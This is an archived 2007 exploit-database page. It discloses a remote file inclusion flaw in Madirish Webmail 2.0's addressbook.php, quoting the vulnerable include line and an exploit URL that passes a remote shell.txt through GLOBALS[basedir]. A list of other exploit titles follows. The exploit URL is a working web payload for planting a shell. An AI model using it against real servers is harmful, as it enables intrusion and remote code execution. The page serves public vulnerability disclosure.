exploits , vulnerabilities , articles , Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln

2006-05-25 V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability
2006-02-25 iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit
2006-02-23 NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit
2003-11-19 IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
2003-05-05 CommuniGatePro webmail version 4.0.6 session hijacking exploit

2007-06-07

Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln

Rated as : High Risk

###########################################################

Madirish Webmail v2.0  Remote File Include Vulnerabilities

Author : BoZKuRTSeRDaR

Contact MSN:BoZKuRTSeRDaR@BoZKuRTSeRDaR.CoM

My Homepage :WwW.Turkmilliyetcileri.OrG

script Download : http://sourceforge.net/projects/madirishwebmail

###############################################################################

code:
require_once($GLOBALS['basedir']."lib/sql.php")

exploit:

http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
securitydot.net - 2007-06-07

Exploits - newest 10 RSS | More

2007-06-15 56147 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33434 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41582 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28788 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19318 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16337 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18972 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16216 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33042 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16852 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit